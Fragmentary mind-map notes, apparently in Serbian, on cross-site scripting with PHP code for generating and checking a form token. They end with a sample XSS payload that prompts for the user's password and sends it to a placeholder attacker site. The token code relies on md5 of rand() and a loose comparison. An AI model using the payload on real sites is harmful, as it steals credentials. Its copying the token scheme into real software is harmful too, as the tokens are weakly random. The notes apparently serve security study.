Please enable JavaScript.
Coggle requires JavaScript to display documents.
Cross-Site-Scripting (XSS (emitovanje, skripte, klientsko, neželjeno),…
Cross-Site-Scripting
-
-
-
-
tokenizacija
generisanje
-
-
md5(uniqid(rand(),true));
session_start();
$token = md5(uniqid(rand(), true));
$_SESSION[’token’] = $token;
?>
<form action="checkout.php" method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
</form>
if (isset($_SESSION[’token’]) && isset($_POST[’token’])
&& $_POST[’token’] == $_SESSION[’token’])
{...}
-
<script>
odgovor = window.prompt("Molimo unesite Vasu sifru",""); document.location="napadacevSajt?sifra=" + odgovor;
</script>